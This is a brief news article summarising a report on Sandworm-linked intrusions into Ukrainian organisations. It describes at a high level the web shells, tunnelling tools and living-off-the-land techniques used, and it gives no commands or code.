Russian hackers target Ukrainian organisations using stealthy living-off-the-land tactics

A new report reveals that Russian-linked threat actors have been mounting covert campaigns against Ukrainian entities, including a large business services firm and a local government body, using minimal malware while relying heavily on built-in Windows tools and dual-use software.

The attackers gained an initial foothold by dropping web shells, one variant named “LocalOlive,” connected to the Russia-linked “Sandworm” sub-group, which then enabled delivery of follow-on tools such as Chisel, plink and rsockstun.

Once inside, they executed commands to disable security scans, scheduled periodic memory dumps, enumerated user sessions, installed OpenSSH, opened remote desktop ports and leveraged “living-off-the-land” tactics to minimise traces.

The overarching implication: highly skilled adversaries are capable of deep reconnaissance and credential theft while keeping a very small footprint making detection and mitigation all the more challenging.